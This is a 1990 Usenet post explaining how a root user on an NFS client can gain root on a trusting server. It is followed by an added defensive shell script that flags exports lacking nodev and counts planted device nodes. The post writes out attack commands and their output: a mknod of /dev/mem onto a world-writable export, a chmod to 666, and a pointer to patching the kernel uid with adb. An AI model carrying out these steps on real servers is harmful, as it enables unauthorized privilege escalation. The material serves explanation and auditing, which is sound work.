becoming root via NFS
Tom Christiansen
tchrist at convex.COM
Thu Dec 20 05:05:41 AEST 1990
[ I've gotten nothing but confused and disbelieving mail on this,
so apparently I did not adequately describe the scenario. ]
From the keyboard of rbj at uunet.UU.NET (Root Boy Jim):
:In article <111544 at convex.convex.com> tchrist at convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.
Says who? This isn't so. I'm on my workstation. I'm the superuser.
I've got the trusting server's filesystem mounted on my system.
(It's a diskless 350, so I have to have something.) I can certainly
do the mknod. Watch (I'm root at cthulhu, my workstation):
cthulhu# df .
Filesystem kbytes used avail capacity Mounted on
globhost:/usr/spool/globdata
371967 280812 53958 84% /rmt/globhost/globdata
[ ``globhost'' is another Sun, but this works with non-Sun NFS
systems as well. ]
cthulhu# ls -lgd .
drwxrwxrwt 43 root bin 4096 Dec 19 11:52 ./
[ Even if it weren't world-write, I could become the owner
and make a world-write subdir. ]
cthulhu# ls -lg /dev/mem
crw-r----- 1 root kmem 3, 0 May 29 1990 /dev/mem
cthulhu# mknod mymem c 3 0
[ I actually have to choose the right major/minor number
for the server, not the client, if it's his kernel I
wish to crack. ]
cthulhu# ls -l mymem
crw-r--r-- 1 -2 3, 0 Dec 19 11:49 mymem
[ See, I made it fine, and it's owned by "nobody". ]
cthulhu# chmod 666 mymem
cthulhu# ls -l mymem
crw-rw-rw- 1 -2 3, 0 Dec 19 11:58 mymem
Now, go over to the server and you can write his kernel as a normal user.
I've already demo'd how to use adb to punch your shell's uid to 0,
although you should get the cred structure, too. You could also make a
nice disk device and read things if you want.
--tom
--
Tom Christiansen tchrist at convex.com convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
to look at yourself in the mirror the next morning." -me
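The post shows the two properties a server can deny: an exported filesystem on which device special files are honoured, and the ability of a remote (squashed-to-nobody) client to leave such a file there at all. The script below is an added audit example from the defender's side and is not part of the original post or of any Sun tooling: it checks, from a mount table in /proc/mounts format (a constructed sample is embedded; 1990-era Suns kept this in /etc/mtab in a different layout), whether given mount points carry the nodev option, and it counts character or block special files found under a directory so that nodes already planted on an export can be found. Mount point names, devices and options in the sample are assumptions chosen to echo the post's globhost scenario.

```sh
#!/bin/sh
# Added audit example, not from the original post.
# 1. missing_nodev: report mount points (exported directories on a server,
#    or NFS mounts on a client) whose mount options lack nodev, so that a
#    special file such as the "mymem" node in the post would be ignored.
# 2. count_device_nodes: count char/block special files under a directory,
#    which on an export should be zero.

# Constructed sample mount table in /proc/mounts format (device, mountpoint,
# fstype, options, dump, pass). Not taken from a real system.
SAMPLE_MOUNTS='/dev/sd0g /usr/spool/globdata ufs rw 0 0
/dev/sd0h /export/home ufs rw,nosuid,nodev 0 0
/dev/sd0a / ufs rw 0 0'

# missing_nodev <mountpoint>...: reads a mount table on stdin and prints the
# number of the named mount points whose option list does not contain nodev.
# Each offender is described on stderr.
missing_nodev() {
    wanted=" $* "
    n=0
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        set -- $line               # split the line into its six fields
        case "$wanted" in
            *" $2 "*) ;;           # $2 is the mount point; only audit listed ones
            *) continue ;;
        esac
        case ",$4," in             # $4 is the comma-separated option list
            *,nodev,*) ;;
            *) n=$((n + 1)); echo "no nodev on $2 ($3, opts: $4)" >&2 ;;
        esac
    done
    echo "$n"
}

# count_device_nodes DIR: number of character or block special files under
# DIR. On an exported filesystem every hit deserves a look, since nothing
# legitimate creates device nodes there.
count_device_nodes() {
    find "$1" \( -type c -o -type b \) 2>/dev/null | wc -l | tr -d ' '
}

# Stand-alone run: audit the sample table for the two exported directories,
# then scan the current directory for special files.
echo "exports without nodev: $(printf '%s\n' "$SAMPLE_MOUNTS" \
    | missing_nodev /usr/spool/globdata /export/home)"
echo "device nodes under .: $(count_device_nodes .)"
```

On a live server the mount table comes from `cat /proc/mounts | missing_nodev /export/a /export/b` (or the equivalent listing on older systems), and the `find` pass can be scheduled against each exported tree; a nonzero result from either check is the condition the post exploits.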